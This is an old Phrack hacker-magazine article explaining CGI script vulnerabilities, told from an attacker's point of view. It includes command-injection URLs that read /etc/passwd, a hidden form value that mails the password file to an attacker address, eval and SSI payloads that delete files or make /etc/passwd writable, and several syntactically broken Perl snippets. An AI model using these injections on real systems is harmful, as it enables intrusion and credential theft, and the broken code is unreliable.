| .oO Phrack 49 Oo. | |
| Volume Seven, Issue Forty-Nine | |
| File 08 of 16 | |
| CGI Security Holes | |
| -------------------------------------------------------------------------- | |
| by Gregory Gilliss | |
| This article will discuss the Common Gateway Interface, its | |
| relationship to the World Wide Web and the Internet, and will endeavor to | |
| point out vulnerabilities in system security exposed by its use. The UNIX | |
| operating system will be the platform central to this discussion. | |
| Programming techniques will be illustrated by examples using PERL. | |
| 1. Introduction | |
| The Common Gateway Interface (CGI) is an interface specification that | |
| allows communication between client programs and information servers which | |
| understand the Hyper-Text Transfer Protocol (HTTP). TCP/IP is the | |
| communications protocol used by the CGI script and the server during the | |
| communications. The default port for communications is port 80 (privileged), | |
| but other non-privileged ports may be specified. | |
| CGI scripts can perform relatively simple processing on the client | |
| side. A CGI script can be used to format Hyper-Text Markup Language (HTML) | |
| documents, dynamically create HTML documents, and dynamically generate | |
| graphical images. CGI can also perform transaction recording using standard | |
| input and standard output. CGI stores information in system environment | |
| variables that can be accessed through the CGI scripts. CGI scripts can also | |
| accept command line arguments. CGI scripts operate in two basic modes: | |
| - In the first mode, the CGI script performs rudimentary data | |
| processing on the input passed to it. An example of data processing is the | |
| popular web lint page that checks the syntax of HTML documents. | |
| - The second mode is where the CGI script acts as a conduit for data | |
| being passed from the client program to the server, and back from the | |
| server to the client. For example, a CGI script can be used as a front end | |
| to a database program running on the server. | |
| CGI scripts can be written using compiled programming languages, | |
| interpreted programming languages, and scripting languages. The only real | |
| advantage that exists for one type of development tool over the other is that | |
| compiled programs tend to execute more quickly than interpreted programs. | |
| Interpreted languages such as AppleScript, TCL, PERL and UNIX shell scripts | |
| afford the possibility of acquiring and modifying the source (discussed | |
| later), and are generally faster to develop than compiled programs. | |
| The set of common methods available to CGI programs is defined in | |
| the HTTP 1.0 specification. The three methods pertinent to this discussion | |
| are the `Get` method, the `Post` method, and the `Put` method. The `Get` | |
| method retrieves information from the server to the client. The `Post` | |
| method asks the server to accept information passed from the client as input | |
| to the specified target. The `Put` method asks the server to accept | |
| information passed from the client as a replacement for the specified target. | |
| 2. Vulnerabilities | |
| The vulnerabilities caused by the use of CGI scripts are not | |
| weaknesses in CGI itself, but are weaknesses inherent in the HTTP | |
| specification and in various system programs. CGI simply allows access to | |
| those vulnerabilities. There are other ways to exploit the system security. | |
| For example, insecure file permissions can be exploited using FTP or telnet. | |
| CGI simply provides more opportunities to exploit these and other security | |
| flaws. | |
| The CGI specification provides opportunities to read files, acquire | |
| shell access, and corrupt file systems on server machines and their attached | |
| hosts. Means of gaining access include: exploiting assumptions of the | |
| script, exploiting weaknesses in the server environment, and exploiting | |
| weaknesses in other programs and system calls. The primary weakness in | |
| CGI scripts is insufficient input validation. | |
| According to the HTTP 1.0 specification, data passed to a CGI script | |
| must be encoded so that it can work on any hardware or software platform. | |
| Data passed by a CGI script using the Get method is appended to the end of a | |
| Universal Resource Locator (URL). This data can be accessed by the CGI | |
| script as an environment variable named QUERY_STRING. Data is passed as | |
| tokens of the form variable=value, with the tokens separated by ampersands | |
| (&). Actual ampersands, and other non-alphanumeric characters, must be | |
| escaped, meaning that they are encoded as two-digit hexadecimal values. | |
| Escaped characters are preceded by a percent sign (%) in the encoded URL. It | |
| is the responsibility of the CGI script to escape or remove characters in | |
| user supplied input data. Characters such as '<' and '>', the delimiters for | |
| HTML tags, are usually removed using a simple search and replace operation, | |
| such as the following: | |
| ----------------8<---------------------------------------------------------- | |
| # Process input values | |
| {$NAME, $VALUE) = split(/=/, $_); # split up each variable=value pair | |
| $VALUE =~ s/\+/ /g; # Replace '+' with ' ' | |
| $VALUE =~ s/%([0-9|A-F]{2})/pack(C,hex,{$1}}/eg; # Replace %xx characters with ASCII | |
| # Escape metacharacters | |
| $VALUE =~ s/([;<>\*\|'&\$!#\(\)\[\]\{\}:"])/\\$1/g;# remove unwanted special characters | |
| $MYDATA[$NAME} = $VALUE; # Assign the value to the associative array | |
| ----------------8<---------------------------------------------------------- | |
| This example removes special characters such as the semi-colon | |
| character, which is interpreted by the shell as a command separator. | |
| Inclusion of a semi-colon in the input data allows for the possibility | |
| of appending an additional command to the input. Take note of the forward | |
| slash characters that precede the characters being substituted. In PERL, a | |
| backslash is required to tell the interpreter not to process the following | |
| character.* | |
| The above example is incomplete since it does not address the | |
| possibility of the new line character '%0a', which can be used to execute | |
| commands other than those provided by the script. Therefore it is possible to | |
| append a string to a URL to perform functions outside of the script. For | |
| example, the following URL requests a copy of /etc/passwd from the server | |
| machine: | |
| http://www.odci.gov/cgi-bin/query?%0a/bin/cat%20/etc/passwd | |
| The strings '%0a" and '%20' are ASCII line feed and blank respectively. | |
| The front end interface to a CGI program is an HTML document called a | |
| form. Forms include the HTML tag <INPUT>. Each <INPUT> tag has a variable | |
| name associated with it. This is the variable name that forms the left hand | |
| side of the previously mentioned variable=value token. The contents of the | |
| variable forms the value portion of the token. Actual CGI scripts may | |
| perform input filtering on the contents of the <INPUT> field. However if the | |
| CGI script does not filter special characters, then a situation analogous to | |
| the above example exists. Interpreted CGI scripts that fail to validate the | |
| <INPUT> data will pass the data directly to the interpreter. ** | |
| Another HTML tag sometime seen in forms is the <SELECT> tag. | |
| <SELECT> tags allow the user on the client side to select from a finite set | |
| of choices. The selection becomes the right hand side of the variable=value | |
| token passed to the CGI script. CGI script often fail to validate the | |
| input from a <SELECT> field, assuming that the field will contain only | |
| pre-defined data. Again, this data is passed directly to the interpreter for | |
| interpreted languages. Compiled programs which do not perform input | |
| validation and/or escape special characters may also be vulnerable. | |
| A shell script or PERL script that invokes the UNIX mail program may | |
| be vulnerable to a shell escape. Mail accepts commands of the form | |
| '~!command' and forks a shell to execute the command. If the CGI | |
| script does not filter out the '~!' sequence, the system is vulnerable. | |
| Sendmail holes can likewise be exploited in this manner. Again, the key is | |
| to find a script that does not properly filter input characters. | |
| If you can find a CGI script that contains a UNIX system() call with | |
| only one argument, then you have found a doorway into the system. When the | |
| system() function is invoked with only one argument, the system forks a | |
| separate shell to handle the request. When this happens, it is possible to | |
| append data to the input and generate unexpected results. For example, a | |
| PERL script containing the following: | |
| system("/usr/bin/sendmail -t %s < %s", $mailto_address < $input_file"); | |
| is designed to mail a copy of $input_file to the mail address specified in | |
| the $mailto_address variable. By calling system() with one argument, the | |
| program causes a separate shell to be forked. By copying and modifying the | |
| input to the form: | |
| <INPUT TYPE="HIDDEN" NAME="mailto_address" | |
| VALUE="address@server.com;mail cracker@hacker.com </etc/passwd"> | |
| we can exploit this weakness and obtain the password file from the server. *** | |
| The system() function is not the only command that will fork a new | |
| shell. the exec() function with a single argument also provides the same | |
| exposure. Opening a file and piping the result also forks a separate shell. | |
| In PERL, the function: | |
| open(FILE, "| program_name $ARGS"); | |
| will open FILE and pipe the contents to program_name, which will run as a | |
| separate shell. | |
| In PERL, the eval command parses and executes whatever argument is | |
| passed to it. CGI scripts that pass arbitrary user input to the eval command | |
| can be used to execute anything the user desires. For example, | |
| $_ = $VALUE; | |
| s/"/\\"/g # Escape double quotes | |
| $RESULT = eval qq/"$_"/; # evaluate the correctly quoted input | |
| would pass the data from $VALUE to eval essentially unchanged, except for | |
| ensuring that the double quote don't confuse the interpreter (how nice of | |
| them). If $VALUE contains "rm -rf *", the results will be disastrous. File | |
| permissions should be examined carefully. CGI scripts that are world | |
| readable can be copied, modified, and replaced. In addition, PERL scripts | |
| that include lines such as the following: | |
| require "cgi-lib"; | |
| are including a library file named cgi-lib. If this file's permissions are | |
| insecure, the script is vulnerable. To check file permissions, the string | |
| '%0a/bin/ls%20-la%20/usr/src/include" could be appended to the URL of a CGI | |
| script using the Get method. | |
| Copying, modifying, and replacing the library file will allow users | |
| to execute command or routines inside the library file. Also, if the PERL | |
| interpreter, which usually resides in /usr/bin, runs as SETUID root, it is | |
| possible to modify file permissions by passing a command directly to the | |
| system through the interpreter. The eval command example above would permit | |
| the execution of : | |
| $_ = "chmod 666 \/etc\/passwd" | |
| $RESULT = eval qq/"$_"/; | |
| which would make the password file world writable. | |
| There is a feature supported under some HTTPD servers called Server | |
| Side Includes (SSI). This is a mechanism that allows the server to modify | |
| the outgoing document before sending it to the client browser. SSI is a | |
| *huge* security hole, and most everyone except the most inexperienced | |
| sysadmin has it disabled. However, in the event that you discover a site | |
| that enables SSI,, the syntax of commands is: | |
| <!--#command variable="value" --> | |
| Both command and 'tag' must be lowercase. If the script source does not | |
| correctly filter input,input such as: | |
| <!--#exec cmd="chmod 666 /etc/passwd"--> | |
| All SSI commands start with a pound sign (#) followed by a keyword. | |
| "exec cmd" launches a shell that executes a command enclosed in the double | |
| quotes. If this option is turned on, you have enormous flexibility with what | |
| you can do on the target machine. | |
| 3. Conclusion | |
| The improper use of CGI scripts affords users a number of | |
| vulnerabilities in system security. Failure to validate user input, poorly | |
| chosen function calls, and insufficient file permissions can all be exploited | |
| through the misuse of CGI. | |
| * Adapted from Mudry, R. J., Serving The Web, Coriolis Group Books, p. 192 | |
| ** Jennifer Myers, Usenet posting | |
| *** Adapted from Phillips, P., Safe CGI Programming, | |